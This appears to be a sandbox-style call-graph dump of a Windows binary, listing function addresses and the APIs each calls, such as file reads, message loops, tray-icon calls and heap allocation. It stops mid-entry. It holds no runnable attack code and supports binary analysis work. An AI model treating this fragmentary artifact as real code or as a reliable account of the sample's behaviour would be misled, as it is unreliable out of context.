94923->94929 94924 b83681 95035 b87c0e 47 API calls __getptd_noexit 94924->95035 94926->94924 94926->94929 94934 b836cf 94926->94934 94927 b83686 95036 b86e10 8 API calls __cftoe2_l 94927->95036 94939 b838c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94929->94939 94931 b837e0 _memset 95038 b87c0e 47 API calls __getptd_noexit 94931->95038 94934->94929 94934->94931 94940 b82933 94934->94940 94947 b8ee0e 94934->94947 95015 b8eb66 94934->95015 95037 b8ec87 47 API calls 3 library calls 94934->95037 94937->94918 94938->94913 94939->94913 94941 b8293d 94940->94941 94942 b82952 94940->94942 95039 b87c0e 47 API calls __getptd_noexit 94941->95039 94942->94934 94944 b82942 95040 b86e10 8 API calls __cftoe2_l 94944->95040 94946 b8294d 94946->94934 94948 b8ee2f 94947->94948 94949 b8ee46 94947->94949 95050 b87bda 47 API calls __getptd_noexit 94948->95050 94950 b8f57e 94949->94950 94954 b8ee80 94949->94954 95065 b87bda 47 API calls __getptd_noexit 94950->95065 94953 b8ee34 95051 b87c0e 47 API calls __getptd_noexit 94953->95051 94957 b8ee88 94954->94957 94963 b8ee9f 94954->94963 94955 b8f583 95066 b87c0e 47 API calls __getptd_noexit 94955->95066 95052 b87bda 47 API calls __getptd_noexit 94957->95052 94960 b8ee94 95067 b86e10 8 API calls __cftoe2_l 94960->95067 94961 b8ee8d 95053 b87c0e 47 API calls __getptd_noexit 94961->95053 94964 b8eeb4 94963->94964 94965 b8eece 94963->94965 94968 b8eeec 94963->94968 94995 b8ee3b 94963->94995 95054 b87bda 47 API calls __getptd_noexit 94964->95054 94965->94964 94970 b8eed9 94965->94970 94969 b869d0 __malloc_crt 47 API calls 94968->94969 94971 b8eefc 94969->94971 95041 b93bf2 94970->95041 94974 b8ef1f 94971->94974 94975 b8ef04 94971->94975 94973 b8efed 94976 b8f066 ReadFile 94973->94976 94979 b8f003 GetConsoleMode 94973->94979 95057 b8f82f 49 API calls 3 library calls 94974->95057 95055 b87c0e 47 API calls __getptd_noexit 94975->95055 94980 b8f088 94976->94980 94981 b8f546 GetLastError 94976->94981 94983 b8f063 94979->94983 94984 b8f017 94979->94984 94980->94981 94988 b8f058 94980->94988 94985 b8f046 94981->94985 94986 b8f553 94981->94986 94982 b8ef09 95056 b87bda 47 API calls __getptd_noexit 94982->95056 94983->94976 94984->94983 94990 b8f01d ReadConsoleW 94984->94990 94997 b8f04c 94985->94997 95058 b87bed 47 API calls 3 library calls 94985->95058 95063 b87c0e 47 API calls __getptd_noexit 94986->95063 94988->94997 95000 b8f0bd 94988->95000 95001 b8f32a 94988->95001 94990->94988 94992 b8f040 GetLastError 94990->94992 94991 b8f558 95064 b87bda 47 API calls __getptd_noexit 94991->95064 94992->94985 94995->94934 94996 b81c9d _free 47 API calls 94996->94995 94997->94995 94997->94996 94999 b8f129 ReadFile 95003 b8f14a GetLastError 94999->95003 95013 b8f154 94999->95013 95000->94999 95008 b8f1aa 95000->95008 95001->94997 95002 b8f430 ReadFile 95001->95002 95007 b8f453 GetLastError 95002->95007 95014 b8f461 95002->95014 95003->95013 95004 b8f267 95009 b8f217 MultiByteToWideChar 95004->95009 95061 b8f82f 49 API calls 3 library calls 95004->95061 95005 b8f257 95060 b87c0e 47 API calls __getptd_noexit 95005->95060 95007->95014 95008->94997 95008->95004 95008->95005 95008->95009 95009->94992 95009->94997 95013->95000 95059 b8f82f 49 API calls 3 library calls 95013->95059 95014->95001 95062 b8f82f 49 API calls 3 library calls 95014->95062 95016 b8eb71 95015->95016 95020 b8eb86 95015->95020 95098 b87c0e 47 API calls __getptd_noexit 95016->95098 95018 b8eb76 95099 b86e10 8 API calls __cftoe2_l 95018->95099 95022 b8ebbb 95020->95022 95029 b8eb81 95020->95029 95100 b93e24 95020->95100 95023 b82933 __flush 47 API calls 95022->95023 95024 b8ebcf 95023->95024 95068 b8ed06 95024->95068 95026 b8ebd6 95027 b82933 __flush 47 API calls 95026->95027 95026->95029 95028 b8ebf9 95027->95028 95028->95029 95030 b82933 __flush 47 API calls 95028->95030 95029->94934 95031 b8ec05 95030->95031 95031->95029 95032 b82933 __flush 47 API calls 95031->95032 95033 b8ec12 95032->95033 95034 b82933 __flush 47 API calls 95033->95034 95034->95029 95035->94927 95036->94929 95037->94934 95038->94927 95039->94944 95040->94946 95042 b93c0a 95041->95042 95043 b93bfd 95041->95043 95045 b87c0e __cftoe2_l 47 API calls 95042->95045 95047 b93c16 95042->95047 95044 b87c0e __cftoe2_l 47 API calls 95043->95044 95046 b93c02 95044->95046 95048 b93c37 95045->95048 95046->94973 95047->94973 95049 b86e10 __cftoe2_l 8 API calls 95048->95049 95049->95046 95050->94953 95051->94995 95052->94961 95053->94960 95054->94961 95055->94982 95056->94995 95057->94970 95058->94997 95059->95013 95060->94997 95061->95009 95062->95014 95063->94991 95064->94997 95065->94955 95066->94960 95067->94995 95069 b8ed12 __lseeki64 95068->95069 95070 b8ed1a 95069->95070 95071 b8ed32 95069->95071 95073 b87bda __chsize_nolock 47 API calls 95070->95073 95072 b8eded 95071->95072 95076 b8ed68 95071->95076 95074 b87bda __chsize_nolock 47 API calls 95072->95074 95075 b8ed1f 95073->95075 95077 b8edf2 95074->95077 95078 b87c0e __cftoe2_l 47 API calls 95075->95078 95080 b8ed8a 95076->95080 95081 b8ed75 95076->95081 95082 b87c0e __cftoe2_l 47 API calls 95077->95082 95079 b8ed27 __lseeki64 95078->95079 95079->95026 95084 b8a8ed ___lock_fhandle 49 API calls 95080->95084 95083 b87bda __chsize_nolock 47 API calls 95081->95083 95087 b8ed82 95082->95087 95085 b8ed7a 95083->95085 95086 b8ed90 95084->95086 95088 b87c0e __cftoe2_l 47 API calls 95085->95088 95089 b8eda3 95086->95089 95090 b8edb6 95086->95090 95091 b86e10 __cftoe2_l 8 API calls 95087->95091 95088->95087 95093 b8ee0e __filbuf 59 API calls 95089->95093 95092 b87c0e __cftoe2_l 47 API calls 95090->95092 95091->95079 95094 b8edbb 95092->95094 95095 b8edaf 95093->95095 95096 b87bda __chsize_nolock 47 API calls 95094->95096 95097 b8ede5 __filbuf LeaveCriticalSection 95095->95097 95096->95095 95097->95079 95098->95018 95099->95029 95101 b869d0 __malloc_crt 47 API calls 95100->95101 95102 b93e39 95101->95102 95102->95022 95104 b83e71 __lseeki64 95103->95104 95105 b83e7f 95104->95105 95106 b83e94 95104->95106 95117 b87c0e 47 API calls __getptd_noexit 95105->95117 95108 b84e1c __lock_file 48 API calls 95106->95108 95110 b83e9a 95108->95110 95109 b83e84 95118 b86e10 8 API calls __cftoe2_l 95109->95118 95119 b83b0c 55 API calls 5 library calls 95110->95119 95113 b83ea5 95120 b83ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 95113->95120 95115 b83eb7 95116 b83e8f __lseeki64 95115->95116 95116->94658 95117->95109 95118->95116 95119->95113 95120->95115 95187 b8344a GetSystemTimeAsFileTime 95121->95187 95123 babdc3 95123->94562 95124->94592 95154->94569 95155->94583 95188 b83478 __aulldiv 95187->95188 95188->95123 95498 ba6529 95497->95498 95499 ba6cc4 FindFirstFileW 95497->95499 95498->94433 95499->95498 95500 ba6cd9 FindClose 95499->95500 95500->95498 95502 b6bd3f 95501->95502 95505 b6bd5a 95501->95505 95503 b6bdfa 48 API calls 95502->95503 95504 b6bd47 CharUpperBuffW 95503->95504 95504->95505 95505->94446 95507 bd436a 95506->95507 95508 b62b8b 95506->95508 95509 b7f4ea 48 API calls 95508->95509 95511 b62b92 95509->95511 95510 b62bb3 95510->94458 95511->95510 95588 b62bce 48 API calls 95511->95588 95514 b6e8f6 95513->95514 95545 b6e906 Mailbox 95513->95545 95515 b6ed52 95514->95515 95514->95545 95672 b7e3cd 335 API calls 95515->95672 95516 b6ebc7 95518 b6ebdd 95516->95518 95673 b62ff6 16 API calls 95516->95673 95518->94458 95520 b6ed63 95520->95518 95521 b6ed70 95520->95521 95674 b7e312 335 API calls Mailbox 95521->95674 95522 b6e94c PeekMessageW 95522->95545 95524 b6ed77 LockWindowUpdate DestroyWindow GetMessageW 95524->95518 95527 b6eda9 95524->95527 95525 bd526e Sleep 95525->95545 95528 bd59ef TranslateMessage DispatchMessageW GetMessageW 95527->95528 95528->95528 95530 bd5a1f 95528->95530 95530->95518 95531 b6ed21 PeekMessageW 95531->95545 95532 b6ebf7 timeGetTime 95532->95545 95534 b7f4ea 48 API calls 95534->95545 95535 b66eed 48 API calls 95535->95545 95536 b6ed3a TranslateMessage DispatchMessageW 95536->95531 95537 bd5557 WaitForSingleObject 95538 bd5574 GetExitCodeProcess CloseHandle 95537->95538 95537->95545 95538->95545 95539 b6d7f7 48 API calls 95558 bd5429 Mailbox 95539->95558 95540 bd588f Sleep 95540->95558 95541 b6edae timeGetTime 95675 b61caa 49 API calls 95541->95675 95542 bd5733 Sleep 95542->95558 95545->95516 95545->95522 95545->95525 95545->95531 95545->95532 95545->95534 95545->95535 95545->95536 95545->95537 95545->95540 95545->95541 95545->95542 95549 b62aae 311 API calls 95545->95549 95551 bd5445 Sleep 95545->95551 95545->95558 95560 b61caa 49 API calls 95545->95560 95565 b6fe30 311 API calls 95545->95565 95567 b745e0 311 API calls 95545->95567 95568 b73200 311 API calls 95545->95568 95570 b6ce19 48 API calls 95545->95570 95571 bacc5c 86 API calls 95545->95571 95573 b6d6e9 55 API calls 95545->95573 95589 b6ef00 95545->95589 95596 b6f110 95545->95596 95661 b7e244 95545->95661 95666 b7dc5f 95545->95666 95671 b6eed0 335 API calls Mailbox 95545->95671 95676 bc8d23 48 API calls 95545->95676 95547 bd5926 GetExitCodeProcess 95552 bd593c WaitForSingleObject 95547->95552 95553 bd5952 CloseHandle 95547->95553 95549->95545 95550 b7dc38 timeGetTime 95550->95558 95551->95545 95552->95545 95552->95553 95553->95558 95554 bd5432 Sleep 95554->95551 95555 bc8c4b 108 API calls 95555->95558 95556 b62c79 107 API calls 95556->95558 95558->95539 95558->95545 95558->95547 95558->95550 95558->95551 95558->95554 95558->95555 95558->95556 95559 bd59ae Sleep 95558->95559 95563 b6ce19 48 API calls 95558->95563 95566 b6d6e9 55 API calls 95558->95566 95677 ba4cbe 49 API calls Mailbox 95558->95677 95678 b61caa 49 API calls 95558->95678 95679 b62aae 335 API calls 95558->95679 95680 bbccb2 50 API calls 95558->95680 95681 ba7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95558->95681 95682 ba6532 63 API calls 3 library calls 95558->95682 95559->95545 95560->95545 95563->95558 95565->95545 95566->95558 95567->95545 95568->95545 95570->95545 95571->95545 95573->95545 95574->94458 95575->94458 95576->94458 95577->94458 95578->94458 95579->94458 95580->94458 95581->94458 95582->94458 95584 b6d6f4 95583->95584 95585 b6d71b 95584->95585 95706 b6d764 55 API calls 95584->95706 95585->94458 95587->94458 95588->95510 95590 b6ef2f 95589->95590 95591 b6ef1d 95589->95591 95684 bacc5c 86 API calls 4 library calls 95590->95684 95683 b6e3b0 335 API calls 2 library calls 95591->95683 95593 b6ef26 95593->95545 95595 bd86f9 95595->95595 95597 b6f130 95596->95597 95600 b6fe30 335 API calls 95597->95600 95604 b6f199 95597->95604 95598 b6f3dd 95601 bd87c8 95598->95601 95612 b6f3f2 95598->95612 95648 b6f431 Mailbox 95598->95648 95599 b6f595 95606 b6d7f7 48 API calls 95599->95606 95599->95648 95602 bd8728 95600->95602 95689 bacc5c 86 API calls 4 library calls 95601->95689 95602->95604 95686 bacc5c 86 API calls 4 library calls 95602->95686 95604->95598 95604->95599 95607 b6d7f7 48 API calls 95604->95607 95642 b6f229 95604->95642 95608 bd87a3 95606->95608 95609 bd8772 95607->95609 95688 b80f0a 52 API calls __cinit 95608->95688 95687 b80f0a 52 API calls __cinit 95609->95687 95610 bacc5c 86 API calls 95610->95648 95639 b6f418 95612->95639 95690 ba9af1 48 API calls 95612->95690 95613 bd8b1b 95623 bd8b2c 95613->95623 95624 bd8bcf 95613->95624 95614 b6f770 95620 bd8a45 95614->95620 95638 b6f77a 95614->95638 95616 b6d6e9 55 API calls 95616->95648 95618 b6fe30 335 API calls 95640 b6f6aa 95618->95640 95619 bd8b7e 95699 bbe40a 335 API calls Mailbox 95619->95699 95696 b7c1af 48 API calls 95620->95696 95621 bd8c53 95704 bacc5c 86 API calls 4 library calls 95621->95704 95622 bd8810 95691 bbeef8 335 API calls 95622->95691 95698 bbf5ee 335 API calls 95623->95698 95701 bacc5c 86 API calls 4 library calls 95624->95701 95625 bd8beb 95702 bbbdbd 335 API calls Mailbox 95625->95702 95627 b6fe30 335 API calls 95627->95648 95635 b71b90 48 API calls 95635->95648 95636 b71b90 48 API calls 95636->95648 95637 bd8c00 95660 b6f537 Mailbox 95637->95660 95703 bacc5c 86 API calls 4 library calls 95637->95703 95638->95635 95639->95613 95639->95640 95639->95648 95640->95614 95640->95618 95641 b6fce0 95640->95641 95640->95648 95640->95660 95641->95660 95700 bacc5c 86 API calls 4 library calls 95641->95700 95642->95598 95642->95599 95642->95639 95642->95648 95644 bd8823 95644->95639 95647 bd884b 95644->95647 95692 bbccdc 48 API calls 95647->95692 95648->95610 95648->95616 95648->95619 95648->95621 95648->95625 95648->95627 95648->95636 95648->95641 95648->95660 95685 b6dd47 48 API calls _memcpy_s 95648->95685 95697 b997ed InterlockedDecrement 95648->95697 95705 b7c1af 48 API calls 95648->95705 95650 bd8857 95652 bd8865 95650->95652 95653 bd88aa 95650->95653 95693 ba9b72 48 API calls 95652->95693 95656 bd88a0 Mailbox 95653->95656 95694 baa69d 48 API calls 95653->95694 95654 b6fe30 335 API calls 95654->95660 95656->95654 95658 bd88e7 95695 b6bc74 48 API calls 95658->95695 95660->95545 95663 bddf42 95661->95663 95665 b7e253 95661->95665 95662 bddf77 95663->95662 95664 bddf59 TranslateAcceleratorW 95663->95664 95664->95665 95665->95545 95667 b7dca3 95666->95667 95669 b7dc71 95666->95669 95667->95545 95668 b7dc96 IsDialogMessageW 95668->95667 95668->95669 95669->95667 95669->95668 95670 bddd1d GetClassLongW 95669->95670 95670->95668 95670->95669 95671->95545 95672->95516 95673->95520 95674->95524 95675->95545 95676->95545 95677->95558 95678->95558 95679->95558 95680->95558 95681->95558 95682->95558 95683->95593 95684->95595 95685->95648 95686->95604 95687->95642 95688->95648 95689->95660 95690->95622 95691->95644 95692->95650 95693->95656 95694->95658 95695->95656 95696->95648 95697->95648 95698->95648 95699->95641 95700->95660 95701->95660 95702->95637 95703->95660 95704->95660 95705->95648 95706->95585 95707->93990 95708 b63742 95709 b6374b 95708->95709 95710 b637c8 95709->95710 95711 b63769 95709->95711 95748 b637c6 95709->95748 95715 b637ce 95710->95715 95716 bd1e00 95710->95716 95712 b63776 95711->95712 95713 b6382c PostQuitMessage 95711->95713 95720 bd1e88 95712->95720 95721 b63781 95712->95721 95749 b637b9 95713->95749 95714 b637ab DefWindowProcW 95714->95749 95717 b637f6 SetTimer RegisterWindowMessageW 95715->95717 95718 b637d3 95715->95718 95763 b62ff6 16 API calls 95716->95763 95725 b6381f CreatePopupMenu 95717->95725 95717->95749 95722 b637da KillTimer 95718->95722 95723 bd1da3 95718->95723 95769 ba4ddd 60 API calls _memset 95720->95769 95726 b63836 95721->95726 95727 b63789 95721->95727 95760 b63847 Shell_NotifyIconW _memset 95722->95760 95735 bd1ddc MoveWindow 95723->95735 95736 bd1da8 95723->95736 95724 bd1e27 95764 b7e312 335 API calls Mailbox 95724->95764 95725->95749 95753 b7eb83 95726->95753 95731 bd1e6d 95727->95731 95732 b63794 95727->95732 95731->95714 95768 b9a5f3 48 API calls 95731->95768 95738 bd1e58 95732->95738 95744 b6379f 95732->95744 95733 bd1e9a 95733->95714 95733->95749 95735->95749 95739 bd1dac 95736->95739 95740 bd1dcb SetFocus 95736->95740 95737 b637ed 95761 b6390f DeleteObject DestroyWindow Mailbox 95737->95761 95767 ba55bd 70 API calls _memset 95738->95767 95739->95744 95745 bd1db5 95739->95745 95740->95749 95744->95714 95765 b63847 Shell_NotifyIconW _memset 95744->95765 95762 b62ff6 16 API calls 95745->95762 95747 bd1e68 95747->95749 95748->95714 95751 bd1e4c 95766 b64ffc 67 API calls _memset 95751->95766 95754 b7ec1c 95753->95754 95755 b7eb9a _memset 95753->95755 95754->95749 95770 b651af 95755->95770 95757 b7ec05 KillTimer SetTimer 95757->95754 95758 bd3c7a Shell_NotifyIconW 95758->95757 95759 b7ebc1 95759->95757 95759->95758 95760->95737 95761->95749 95762->95749 95763->95724 95764->95744 95765->95751 95766->95748 95767->95747 95768->95748 95769->95733 95771 b651cb 95770->95771 95791 b652a2 Mailbox 95770->95791 95772 b66b0f 48 API calls 95771->95772 95773 b651d9 95772->95773 95774 b651e6 95773->95774 95775 bd3ca1 LoadStringW 95773->95775 95776 b66a63 48 API calls 95774->95776 95777 bd3cbb 95775->95777 95778 b651fb 95776->95778 95793 b6510d 48 API calls Mailbox 95777->95793 95778->95777 95780 b6520c 95778->95780 95781 b65216 95780->95781 95782 b652a7 95780->95782 95792 b6510d 48 API calls Mailbox 95781->95792 95784 b66eed 48 API calls 95782->95784 95787 b65220 _memset _wcscpy 95784->95787 95785 bd3cc5 95786 b6518c 48 API calls 95785->95786 95785->95787 95788 bd3ce7 95786->95788 95789 b65288 Shell_NotifyIconW 95787->95789 95790 b6518c 48 API calls 95788->95790 95789->95791 95790->95787 95791->95759 95792->95787 95793->95785 95794 b85dfd 95795 b85e09 __lseeki64 95794->95795 95831 b87eeb GetStartupInfoW 95795->95831 95797 b85e0e 95833 b89ca7 GetProcessHeap 95797->95833 95799 b85e66 95800 b85e71 95799->95800 95915 b85f4d 47 API calls 3 library calls 95799->95915 95834 b87b47 95800->95834 95803 b85e77 95804 b85e82 __RTC_Initialize 95803->95804 95916 b85f4d 47 API calls 3 library calls 95803->95916 95855 b8acb3 95804->95855 95807 b85e91 95808 b85e9d GetCommandLineW 95807->95808 95917 b85f4d 47 API calls 3 library calls 95807->95917 95874 b92e7d GetEnvironmentStringsW 95808->95874 95811 b85e9c 95811->95808 95814 b85eb7 95815 b85ec2 95814->95815 95918 b8115b 47 API calls 3 library calls 95814->95918 95884 b92cb4 95815->95884 95818 b85ec8 95819 b85ed3 95818->95819 95919 b8115b 47 API calls 3 library calls 95818->95919 95898 b81195 95819->95898 95822 b85edb 95823 b85ee6 __wwincmdln 95822->95823 95920 b8115b 47 API calls 3 library calls 95822->95920 95902 b63a0f 95823->95902 95832 b87f01 95831->95832 95832->95797 95833->95799 95923 b8123a 30 API calls 2 library calls 95834->95923 95836 b87b4c 95924 b87e23 InitializeCriticalSectionAndSpinCount 95836->95924 95838 b87b51 95839 b87b55 95838->95839 95926 b87e6d TlsAlloc 95838->95926 95925 b87bbd 50 API calls 2 library calls 95839->95925 95842 b87b5a 95842->95803 95843 b87b67 95843->95839 95844 b87b72 95843->95844 95927 b86986 95844->95927 95847 b87bb4 95935 b87bbd 50 API calls 2 library calls 95847->95935 95850 b87b93 95850->95847 95852 b87b99 95850->95852 95851 b87bb9 95851->95803 95934 b87a94 47 API calls 4 library calls 95852->95934 95854 b87ba1 GetCurrentThreadId 95854->95803 95856 b8acbf __lseeki64 95855->95856 95857 b87cf4 __lock 47 API calls 95856->95857 95858 b8acc6 95857->95858 95859 b86986 __calloc_crt 47 API calls 95858->95859 95860 b8acd7 95859->95860 95861 b8ad42 GetStartupInfoW 95860->95861 95862 b8ace2 __lseeki64 @_EH4_CallFilterFunc@8 95860->95862 95869 b8ae80 95861->95869 95871 b8ad57 95861->95871 95862->95807 95863 b8af44 95944 b8af58 LeaveCriticalSection _doexit 95863->95944 95865 b8aec9 GetStdHandle 95865->95869 95866 b86986 __calloc_crt 47 API calls 95866->95871 95867 b8aedb GetFileType 95867->95869 95868 b8ada5 95868->95869 95872 b8ade5 InitializeCriticalSectionAndSpinCount 95868->95872 95873 b8add7 GetFileType 95868->95873 95869->95863 95869->95865 95869->95867 95870 b8af08 InitializeCriticalSectionAndSpinCount 95869->95870 95870->95869 95871->95866 95871->95868 95871->95869 95872->95868 95873->95868 95873->95872 95875 b85ead 95874->95875 95877 b92e8e 95874->95877 95880 b92a7b GetModuleFileNameW 95875->95880 95876 b869d0 __malloc_crt 47 API calls 95878 b92eb4 _memcpy_s 95876->95878 95877->95876 95879 b92eca FreeEnvironmentStringsW 95878->95879 95879->95875 95881 b92aaf _wparse_cmdline 95880->95881 95882 b869d0 __malloc_crt 47 API calls 95881->95882 95883 b92aef _wparse_cmdline 95881->95883 95882->95883 95883->95814 95885 b92ccd __NMSG_WRITE 95884->95885 95889 b92cc5 95884->95889 95886 b86986 __calloc_crt 47 API calls 95885->95886 95894 b92cf6 __NMSG_WRITE 95886->95894 95887 b92d4d 95888 b81c9d _free 47 API calls 95887->95888 95888->95889 95889->95818 95890 b86986 __calloc_crt 47 API calls 95890->95894 95891 b92d72 95893 b81c9d _free 47 API calls 95891->95893 95893->95889 95894->95887 95894->95889 95894->95890 95894->95891 95895 b92d89 95894->95895 95945 b92567 47 API calls __cftoe2_l 95894->95945 95946 b86e20 IsProcessorFeaturePresent 95895->95946 95897 b92d95 95897->95818 95899 b811a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95898->95899 95901 b811e0 __IsNonwritableInCurrentImage 95899->95901 95961 b80f0a 52 API calls __cinit 95899->95961 95901->95822 95903 bd1ebf 95902->95903 95904 b63a29 95902->95904 95905 b63a63 IsThemeActive 95904->95905 95962 b81405 95905->95962 95909 b63a8f 95974 b63adb SystemParametersInfoW SystemParametersInfoW 95909->95974 95911 b63a9b 95975 b63d19 95911->95975 95915->95800 95916->95804 95917->95811 95923->95836 95924->95838 95925->95842 95926->95843 95930 b8698d 95927->95930 95929 b869ca 95929->95847 95933 b87ec9 TlsSetValue 95929->95933 95930->95929 95931 b869ab Sleep 95930->95931 95936 b930aa 95930->95936 95932 b869c2 95931->95932 95932->95929 95932->95930 95933->95850 95934->95854 95935->95851 95937 b930b5 95936->95937 95942 b930d0 __calloc_impl 95936->95942 95938 b930c1 95937->95938 95937->95942 95943 b87c0e 47 API calls __getptd_noexit 95938->95943 95940 b930e0 HeapAlloc 95941 b930c6 95940->95941 95940->95942 95941->95930 95942->95940 95942->95941 95943->95941 95944->95862 95945->95894 95947 b86e2b 95946->95947 95952 b86cb5 95947->95952 95951 b86e46 95951->95897 95953 b86ccf _memset __call_reportfault 95952->95953 95954 b86cef IsDebuggerPresent 95953->95954 95960 b881ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95954->95960 95956 b8a70c __cftoe2_l 6 API calls 95958 b86dd6 95956->95958 95957 b86db3 __call_reportfault 95957->95956 95959 b88197 GetCurrentProcess TerminateProcess 95958->95959 95959->95951 95960->95957 95961->95901 95963 b87cf4 __lock 47 API calls 95962->95963 95964 b81410 95963->95964 96027 b87e58 LeaveCriticalSection 95964->96027 95966 b63a88 95967 b8146d 95966->95967 95968 b81491 95967->95968 95969 b81477 95967->95969 95968->95909 95969->95968 96028 b87c0e 47 API calls __getptd_noexit 95969->96028 95971 b81481 96029 b86e10 8 API calls __cftoe2_l 95971->96029 95973 b8148c 95973->95909 95974->95911 95976 b63d26 __ftell_nolock 95975->95976 95977 b6d7f7 48 API calls 95976->95977 95978 b63d31 GetCurrentDirectoryW 95977->95978 96030 b661ca 95978->96030 96027->95966 96028->95971 96029->95973 96149 b7e99b 96030->96149 96034 b661eb 96035 b65374 50 API calls 96034->96035 96036 b661ff 96035->96036 96037 b6ce19 48 API calls 96036->96037 96038 b6620c 96037->96038 96166 b639db 96038->96166 96040 b66216 Mailbox 96041 b66eed 48 API calls 96040->96041 96042 b6622b 96041->96042 96178 b69048 96042->96178 96045 b6ce19 48 API calls 96046 b66244 96045->96046 96047 b6d6e9 55 API calls 96046->96047 96048 b66254 Mailbox 96047->96048 96049 b6ce19 48 API calls 96048->96049 96050 b6627c 96049->96050 96051 b6d6e9 55 API calls 96050->96051 96052 b6628f Mailbox 96051->96052 96053 b6ce19 48 API calls 96052->96053 96054 b662a0 96053->96054 96055 b6d645 53 API calls 96054->96055 96056 b662b2 Mailbox 96055->96056 96057 b6d7f7 48 API calls 96056->96057 96058 b662c5 96057->96058 96181 b663fc 96058->96181 96062 b662df 96063 bd1c08 96062->96063 96064 b662e9 96062->96064 96066 b663fc 48 API calls 96063->96066 96065 b80fa7 _W_store_winword 59 API calls 96064->96065 96150 b6d7f7 48 API calls 96149->96150 96151 b661db 96150->96151 96152 b66009 96151->96152 96153 b66016 __ftell_nolock 96152->96153 96154 b66a63 48 API calls 96153->96154 96156 b6617c Mailbox 96153->96156 96157 b66048 96154->96157 96156->96034 96165 b6607e Mailbox 96157->96165 96198 b661a6 96157->96198 96158 b6614f 96158->96156 96159 b6ce19 48 API calls 96158->96159 96161 b66170 96159->96161 96160 b6ce19 48 API calls 96160->96165 96162 b664cf 48 API calls 96161->96162 96162->96156 96163 b661a6 48 API calls 96163->96165 96164 b664cf 48 API calls 96164->96165 96165->96156 96165->96158 96165->96160 96165->96163 96165->96164 96167 b641a9 136 API calls 96166->96167 96168 b639fe 96167->96168 96169 b63a06 96168->96169 96201 bac396 96168->96201 96169->96040 96172 bd2ff0 96173 b81c9d _free 47 API calls 96172->96173 96175 bd2ffd 96173->96175 96174 b64252 84 API calls 96174->96172 96176 b64252 84 API calls 96175->96176 96177 bd3006 96176->96177 96177->96177 96179 b7f4ea 48 API calls 96178->96179 96180 b66237 96179->96180 96180->96045 96182 b66406 96181->96182 96183 b6641f 96181->96183 96184 b66eed 48 API calls 96182->96184 96185 b66a63 48 API calls 96183->96185 96186 b662d1 96184->96186 96185->96186 96187 b80fa7 96186->96187 96188 b81028 96187->96188 96189 b80fb3 96187->96189 96240 b8103a 59 API calls 3 library calls 96188->96240 96193 b80fd8 96189->96193 96238 b87c0e 47 API calls __getptd_noexit 96189->96238 96192 b81035 96192->96062 96193->96062 96194 b80fbf 96239 b86e10 8 API calls __cftoe2_l 96194->96239 96196 b80fca 96196->96062 96199 b6bdfa 48 API calls 96198->96199 96200 b661b1 96199->96200 96200->96157 96202 b64517 83 API calls 96201->96202 96203 bac405 96202->96203 96236 bac56d 94 API calls 2 library calls 96203->96236 96205 bac417 96206 b644ed 64 API calls 96205->96206 96234 bac41b 96205->96234 96207 bac432 96206->96207 96208 b644ed 64 API calls 96207->96208 96209 bac442 96208->96209 96210 b644ed 64 API calls 96209->96210 96211 bac45d 96210->96211 96212 b644ed 64 API calls 96211->96212 96213 bac478 96212->96213 96214 b64517 83 API calls 96213->96214 96215 bac48f 96214->96215 96216 b8395c __crtLCMapStringA_stat 47 API calls 96215->96216 96217 bac496 96216->96217 96218 b8395c __crtLCMapStringA_stat 47 API calls 96217->96218 96219 bac4a0 96218->96219 96220 b644ed 64 API calls 96219->96220 96221 bac4b4 96220->96221 96237 babf5a GetSystemTimeAsFileTime 96221->96237 96223 bac4c7 96224 bac4dc 96223->96224 96225 bac4f1 96223->96225 96226 b81c9d _free 47 API calls 96224->96226 96227 bac556 96225->96227 96228 bac4f7 96225->96228 96230 bac4e2 96226->96230 96229 b81c9d _free 47 API calls 96227->96229 96231 bab965 118 API calls 96228->96231 96229->96234 96232 b81c9d _free 47 API calls 96230->96232 96233 bac54e 96231->96233 96232->96234 96235 b81c9d _free 47 API calls 96233->96235 96234->96172 96234->96174 96235->96234 96236->96205 96237->96223 96238->96194 96239->96196 96240->96192 96445 195fa70 96459 195d6c0 96445->96459 96447 195fb06 96462 195f960 96447->96462 96461 195dd4b 96459->96461 96465 1960b30 GetPEB 96459->96465 96461->96447 96463 195f969 Sleep 96462->96463 96464 195f977 96463->96464 96465->96461 96466 b6f030 96469 b73b70 96466->96469 96468 b6f03c 96470 b73bc8 96469->96470 96489 b742a5 96469->96489 96471 b73bef 96470->96471 96473 bd6fd1 96470->96473 96475 bd6f7e 96470->96475 96482 bd6f9b 96470->96482 96472 b7f4ea 48 API calls 96471->96472 96474 b73c18 96472->96474 96548 bbceca 335 API calls Mailbox 96473->96548 96477 b7f4ea 48 API calls 96474->96477 96475->96471 96478 bd6f87 96475->96478 96520 b73c2c _memcpy_s __NMSG_WRITE 96477->96520 96545 bbd552 335 API calls Mailbox 96478->96545 96479 bd6fbe 96547 bacc5c 86 API calls 4 library calls 96479->96547 96482->96479 96546 bbda0e 335 API calls 2 library calls 96482->96546 96483 b742f2 96567 bacc5c 86 API calls 4 library calls 96483->96567 96486 bd73b0 96486->96468 96487 bd7297 96556 bacc5c 86 API calls 4 library calls 96487->96556 96488 bd737a 96566 bacc5c 86 API calls 4 library calls 96488->96566 96560 bacc5c 86 API calls 4 library calls 96489->96560 96490 b6cdb9 48 API calls 96490->96520 96494 bd707e 96549 bacc5c 86 API calls 4 library calls 96494->96549 96496 b740df 96557 bacc5c 86 API calls 4 library calls 96496->96557 96497 b6d6e9 55 API calls 96497->96520 96499 b7dce0 53 API calls 96499->96520 96502 b6d645 53 API calls 96502->96520 96504 bd72d2 96558 bacc5c 86 API calls 4 library calls 96504->96558 96506 b6fe30 335 API calls 96506->96520 96508 bd7350 96564 bacc5c 86 API calls 4 library calls 96508->96564 96509 bd72e9 96559 bacc5c 86 API calls 4 library calls 96509->96559 96510 bd7363 96565 bacc5c 86 API calls 4 library calls 96510->96565 96514 b66a63 48 API calls 96514->96520 96516 b7c050 48 API calls 96516->96520 96517 bd714c 96553 bbccdc 48 API calls 96517->96553 96518 b7f4ea 48 API calls 96518->96520 96520->96483 96520->96487 96520->96488 96520->96489 96520->96490 96520->96494 96520->96496 96520->96497 96520->96499 96520->96502 96520->96504 96520->96506 96520->96508 96520->96509 96520->96510 96520->96514 96520->96516 96520->96517 96520->96518 96521 bd733f 96520->96521 96523 b6d286 48 API calls 96520->96523 96525 